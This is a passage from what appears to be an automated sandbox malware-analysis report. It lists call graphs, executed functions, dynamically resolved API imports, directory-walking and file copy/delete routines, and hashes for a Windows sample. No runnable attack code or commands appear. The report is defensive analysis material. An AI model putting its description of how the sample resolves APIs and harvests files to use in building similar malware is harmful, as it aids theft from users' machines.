62095->62074 62096 6c743060 ?Startup@TimeStamp@mozilla@ ?Now@TimeStamp@mozilla@@CA?AV12@_N ?InitializeUptime@mozilla@ 62101 6c77ab2a 62096->62101 62100 6c7430db 62105 6c77ae0c _crt_atexit _register_onexit_function 62101->62105 62103 6c7430cd 62104 6c77b320 5 API calls ___raise_securityfailure 62103->62104 62104->62100 62105->62103 62106 6c7435a0 62107 6c7435c4 InitializeCriticalSectionAndSpinCount getenv 62106->62107 62122 6c743846 __aulldiv 62106->62122 62109 6c7438fc strcmp 62107->62109 62113 6c7435f3 __aulldiv 62107->62113 62112 6c743912 strcmp 62109->62112 62109->62113 62110 6c7435f8 QueryPerformanceFrequency 62110->62113 62111 6c7438f4 62112->62113 62113->62110 62114 6c743622 _strnicmp 62113->62114 62115 6c743944 _strnicmp 62113->62115 62117 6c74395d 62113->62117 62118 6c743664 GetSystemTimeAdjustment 62113->62118 62121 6c74375c 62113->62121 62114->62113 62114->62115 62115->62113 62115->62117 62116 6c74376a QueryPerformanceCounter EnterCriticalSection 62119 6c7437b3 LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 62116->62119 62116->62121 62118->62113 62120 6c7437fc LeaveCriticalSection 62119->62120 62119->62121 62120->62121 62120->62122 62121->62116 62121->62119 62121->62120 62121->62122 62123 6c77b320 5 API calls ___raise_securityfailure 62122->62123 62123->62111 62124 6c75c930 GetSystemInfo VirtualAlloc 62125 6c75c9a3 GetSystemInfo 62124->62125 62131 6c75c973 62124->62131 62127 6c75c9b6 62125->62127 62128 6c75c9d0 62125->62128 62127->62128 62130 6c75c9bd 62127->62130 62128->62131 62132 6c75c9d8 VirtualAlloc 62128->62132 62129 6c75c99b 62130->62131 62133 6c75c9c1 VirtualFree 62130->62133 62140 6c77b320 5 API calls ___raise_securityfailure 62131->62140 62134 6c75c9f0 62132->62134 62135 6c75c9ec 62132->62135 62133->62131 62141 6c77cbe8 GetCurrentProcess TerminateProcess 62134->62141 62135->62131 62140->62129 62142 6c77b830 62143 6c77b86e dllmain_crt_process_detach 62142->62143 62144 6c77b83b 62142->62144 62146 6c77b840 62143->62146 62145 6c77b860 dllmain_crt_process_attach 62144->62145 62144->62146 62145->62146 62147 6c77b9c0 62148 6c77b9ce dllmain_dispatch 62147->62148 62149 6c77b9c9 62147->62149 62151 6c77bef1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 62149->62151 62151->62148 62152 6c77b8ae 62154 6c77b8ba ___scrt_is_nonwritable_in_current_image 62152->62154 62153 6c77b8e3 dllmain_raw 62155 6c77b8c9 62153->62155 62157 6c77b8fd dllmain_crt_dispatch 62153->62157 62154->62153 62154->62155 62156 6c77b8de 62154->62156 62165 6c75bed0 DisableThreadLibraryCalls LoadLibraryExW 62156->62165 62157->62155 62157->62156 62159 6c77b91e 62160 6c77b94a 62159->62160 62166 6c75bed0 DisableThreadLibraryCalls LoadLibraryExW 62159->62166 62160->62155 62161 6c77b953 dllmain_crt_dispatch 62160->62161 62161->62155 62162 6c77b966 dllmain_raw 62161->62162 62162->62155 62164 6c77b936 dllmain_crt_dispatch dllmain_raw 62164->62160 62165->62159 62166->62164

                                                                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                                                                        Function 00416240 Relevance: 165.7, APIs: 110, Instructions: 674libraryloaderCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,043E7440), ref: 0041625D
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,043E7520), ref: 00416275
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,04403460), ref: 0041628E
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,044034A8), ref: 004162A6
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,04403508), ref: 004162BE
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,04403448), ref: 004162D7
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,043E6190), ref: 004162EF
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,044034D8), ref: 00416307
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,04403490), ref: 00416320
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,04403478), ref: 00416338
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,044034C0), ref: 00416350
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,043E72C0), ref: 00416369
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,043E7280), ref: 00416381
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,043E7240), ref: 00416399
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,043E7400), ref: 004163B2
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,044034F0), ref: 004163CA
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,04405F38), ref: 004163E2
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,043E6348), ref: 004163FB
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,043E73C0), ref: 00416413
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,04405EA8), ref: 0041642B
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,04405F68), ref: 00416444
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,04405EF0), ref: 0041645C
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,04405F20), ref: 00416474
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,043E74E0), ref: 0041648D
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,04405EC0), ref: 004164A5
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,04405F50), ref: 004164BD
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,04405ED8), ref: 004164D6
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,04405F08), ref: 004164EE
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,04405E30), ref: 00416506
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,04405C50), ref: 0041651F
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,04405E18), ref: 00416537
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,04405D58), ref: 0041654F
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,04405BF0), ref: 00416568
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,043E23E8), ref: 00416580
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,04405C08), ref: 00416598
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,04405D70), ref: 004165B1
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,043E75E0), ref: 004165C9
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,04405CB0), ref: 004165E1
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,043E7580), ref: 004165FA
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,04405D88), ref: 00416612
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,04405E60), ref: 0041662A
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,043E72E0), ref: 00416643
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,043E7460), ref: 0041665B
                                                                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(04405DA0,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 0041666D
                                                                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(04405DB8,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 0041667E
                                                                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(04405C68,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 00416690
                                                                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(04405DD0,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166A2
                                                                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(04405DE8,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166B3
                                                                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(04405C80,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166C5
                                                                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(04405CF8,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166D7
                                                                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(04405E90,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166E8
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75FD0000,043E7420), ref: 0041670A
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75FD0000,04405BD8), ref: 00416722
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75FD0000,04403790), ref: 0041673A
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75FD0000,04405CC8), ref: 00416753
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75FD0000,043E7300), ref: 0041676B
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(73B30000,043E6118), ref: 00416790
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(73B30000,043E7260), ref: 004167A9
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(73B30000,043E61B8), ref: 004167C1
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(73B30000,04405C98), ref: 004167D9
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(73B30000,04405E78), ref: 004167F2
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(73B30000,043E74A0), ref: 0041680A
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(73B30000,043E74C0), ref: 00416822
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(73B30000,04405E00), ref: 0041683B
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(763B0000,043E7320), ref: 0041685C
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(763B0000,043E7500), ref: 00416874
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(763B0000,04405E48), ref: 0041688D
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(763B0000,04405CE0), ref: 004168A5
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(763B0000,043E73E0), ref: 004168BD
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(750F0000,043E5FB0), ref: 004168E3
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(750F0000,043E6168), ref: 004168FB
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(750F0000,04405C20), ref: 00416913
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(750F0000,043E72A0), ref: 0041692C
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(750F0000,043E73A0), ref: 00416944
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(750F0000,043E6140), ref: 0041695C
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75A50000,04405D10), ref: 00416982
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75A50000,043E7340), ref: 0041699A
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75A50000,04403840), ref: 004169B2
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75A50000,04405D28), ref: 004169CB
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75A50000,04405BA8), ref: 004169E3
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75A50000,043E7560), ref: 004169FB
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75A50000,043E7540), ref: 00416A14
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75A50000,04405C38), ref: 00416A2C
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75A50000,04405BC0), ref: 00416A44
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75070000,043E75A0), ref: 00416A66
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75070000,04405D40), ref: 00416A7E
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75070000,04406160), ref: 00416A96
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75070000,04406298), ref: 00416AAF
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75070000,04406040), ref: 00416AC7
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(74E50000,043E75C0), ref: 00416AE8
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(74E50000,043E7600), ref: 00416B01
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75320000,043E7220), ref: 00416B22
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75320000,044060D0), ref: 00416B3A
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(6F080000,043E7360), ref: 00416B60
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(6F080000,043E7380), ref: 00416B78
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(6F080000,04406EF8), ref: 00416B90
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(6F080000,04405FB0), ref: 00416BA9
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(6F080000,04406C38), ref: 00416BC1
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(6F080000,04406D58), ref: 00416BD9
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(6F080000,04406E78), ref: 00416BF2
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(6F080000,04406DB8), ref: 00416C0A
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(74E00000,04406190), ref: 00416C2B
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(74E00000,04403760), ref: 00416C44
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(74E00000,04406058), ref: 00416C5C
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(74E00000,04406070), ref: 00416C74
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(74DF0000,04406BF8), ref: 00416C96
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(6CA70000,04405FE0), ref: 00416CB7
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(6CA70000,04406C98), ref: 00416CCF
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(6CA70000,044061A8), ref: 00416CE8
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(6CA70000,04406178), ref: 00416D00
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2238633743-0
                                                                                                                                                                                                                                                                                        • Opcode ID: ce70c898548f88182f5d017b929846a165f52d01e2510d34cdd7b30da02966dd
                                                                                                                                                                                                                                                                                        • Instruction ID: 6fdcbfc83a7e6ced85b92bf4002cf1d70b18d179e1e2f66c0d1faa926a602d30
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ce70c898548f88182f5d017b929846a165f52d01e2510d34cdd7b30da02966dd
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6E623EB5510E10AFC374DFA8FE88A1637ABBBCC311311A519A60AC72A4DF759483CF95
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00411650 Relevance: 44.0, APIs: 20, Strings: 5, Instructions: 237filestringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 00411669
                                                                                                                                                                                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00411680
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 004116D2
                                                                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,0041D7F8), ref: 004116E4
                                                                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,0041D7FC), ref: 004116FA
                                                                                                                                                                                                                                                                                        • FindNextFileA.KERNELBASE(000000FF,?), ref: 00411980
                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(000000FF), ref: 00411995
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                                                                                                                                                                                                                                                                        • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                                                                                                                                                                                                                                                                        • API String ID: 1125553467-2524465048
                                                                                                                                                                                                                                                                                        • Opcode ID: e24380de87f91f985b66d320dbe961f46d573dc966b27323ddd82aaccc6d65a1
                                                                                                                                                                                                                                                                                        • Instruction ID: 56f1237c2d7c520c90c98f1ce5fb3a6d9b51b415e2d0c2f733ce4a2014328567
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e24380de87f91f985b66d320dbe961f46d573dc966b27323ddd82aaccc6d65a1
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AE9172B19006189BDB24EFA4DC85FEA737DBF88300F044589F61A92191DB789AC5CFA5
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C7435A0 Relevance: 38.8, APIs: 16, Strings: 6, Instructions: 294stringtimeCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(6C7CF688,00001000), ref: 6C7435D5
                                                                                                                                                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C7435E0
                                                                                                                                                                                                                                                                                        • QueryPerformanceFrequency.KERNEL32(?), ref: 6C7435FD
                                                                                                                                                                                                                                                                                        • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C74363F
                                                                                                                                                                                                                                                                                        • GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C74369F
                                                                                                                                                                                                                                                                                        • __aulldiv.LIBCMT ref: 6C7436E4
                                                                                                                                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 6C743773
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C7CF688), ref: 6C74377E
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C7CF688), ref: 6C7437BD
                                                                                                                                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 6C7437C4
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C7CF688), ref: 6C7437CB
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C7CF688), ref: 6C743801
                                                                                                                                                                                                                                                                                        • __aulldiv.LIBCMT ref: 6C743883
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C743902
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C743918
                                                                                                                                                                                                                                                                                        • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C74394C
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
                                                                                                                                                                                                                                                                                        • String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC$r
                                                                                                                                                                                                                                                                                        • API String ID: 301339242-3647752926
                                                                                                                                                                                                                                                                                        • Opcode ID: 1046dacf06819e22c0b23405e447d134bd53dcc90d3ab03f45cc3cf728388501
                                                                                                                                                                                                                                                                                        • Instruction ID: 6e622915d2f07d0ae95690ccccb175004c7357fc3a13d6b7c0930d9ccd21a1ee
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1046dacf06819e22c0b23405e447d134bd53dcc90d3ab03f45cc3cf728388501
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F7B1A571B053129FDB08DF29C94561ABBF9FB8A704F05893EE899E3750D7309A00CB91
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0040B610 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 918 40b610-40b6a2 call 416d40 call 416f20 call 416fb0 call 416ea0 call 416e00 * 2 call 416d40 * 2 call 4170d0 FindFirstFileA 937 40b6e1-40b6f5 StrCmpCA 918->937 938 40b6a4-40b6dc call 416e00 * 6 call 413220 918->938 939 40b6f7-40b70b StrCmpCA 937->939 940 40b70d 937->940 983 40bf8b-40bf8e 938->983 939->940 942 40b712-40b78b call 416e20 call 416f20 call 416fb0 * 2 call 416ea0 call 416e00 * 3 939->942 943 40bf30-40bf43 FindNextFileA 940->943 988 40b791-40b817 call 416fb0 * 4 call 416ea0 call 416e00 * 4 942->988 989 40b81c-40b89d call 416fb0 * 4 call 416ea0 call 416e00 * 4 942->989 943->937 945 40bf49-40bf56 FindClose call 416e00 943->945 951 40bf5b-40bf86 call 416e00 * 5 call 413220 945->951 951->983 1024 40b8a2-40b8b8 call 4170d0 StrCmpCA 988->1024 989->1024 1028 40ba79-40ba8f StrCmpCA 1024->1028 1029 40b8be-40b8d2 StrCmpCA 1024->1029 1031 40ba91-40bad1 call 401500 call 416da0 * 3 call 409b30 1028->1031 1032 40bade-40baf4 StrCmpCA 1028->1032 1029->1028 1030 40b8d8-40b9f2 call 416d40 call 415260 call 416fb0 call 416f20 call 416ea0 call 416e00 * 3 call 4170d0 * 2 CopyFileA call 416d40 call 416fb0 * 2 call 416ea0 call 416e00 * 2 call 416da0 call 4093a0 1029->1030 1185 40b9f4-40ba36 call 416da0 call 401500 call 404dc0 call 416e00 1030->1185 1186 40ba3b-40ba74 call 4170d0 DeleteFileA call 417040 call 4170d0 call 416e00 * 2 1030->1186 1094 40bad6-40bad9 1031->1094 1034 40bb66-40bb7e call 416da0 call 415490 1032->1034 1035 40baf6-40bb0d call 4170d0 StrCmpCA 1032->1035 1059 40bc51-40bc66 StrCmpCA 1034->1059 1060 40bb84-40bb8b 1034->1060 1048 40bb61 1035->1048 1049 40bb0f-40bb5b call 401500 call 416da0 * 3 call 40a030 1035->1049 1051 40beb9-40bec2 1048->1051 1049->1048 1056 40bf20-40bf2b call 417040 * 2 1051->1056 1057 40bec4-40bf15 call 401500 call 416da0 * 2 call 416d40 call 40b610 1051->1057 1056->943 1138 40bf1a 1057->1138 1066 40be50-40be65 StrCmpCA 1059->1066 1067 40bc6c-40bdcf call 416d40 call 416fb0 call 416ea0 call 416e00 call 415260 call 416f20 call 416ea0 call 416e00 * 2 call 4170d0 * 2 CopyFileA call 401500 call 416da0 * 3 call 40a6e0 call 401500 call 416da0 * 3 call 40ace0 call 4170d0 StrCmpCA 1059->1067 1069 40bbf7-40bc41 call 401500 call 416da0 call 416d40 call 416da0 call 40a030 1060->1069 1070 40bb8d-40bb94 1060->1070 1066->1051 1077 40be67-40beae call 401500 call 416da0 * 3 call 40aa20 1066->1077 1217 40bdd1-40be1b call 401500 call 416da0 * 3 call 40b250 1067->1217 1218 40be26-40be3e call 4170d0 DeleteFileA call 417040 1067->1218 1141 40bc46 1069->1141 1071 40bbf5 1070->1071 1072 40bb96-40bbef call 401500 call 416da0 call 416d40 call 416da0 call 40a030 1070->1072 1088 40bc4c 1071->1088 1072->1071 1144 40beb3 1077->1144 1088->1051 1094->1051 1138->1056 1141->1088 1144->1051 1185->1186 1186->1028 1234 40be20 1217->1234 1225 40be43-40be4e call 416e00 1218->1225 1225->1051 1234->1218
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
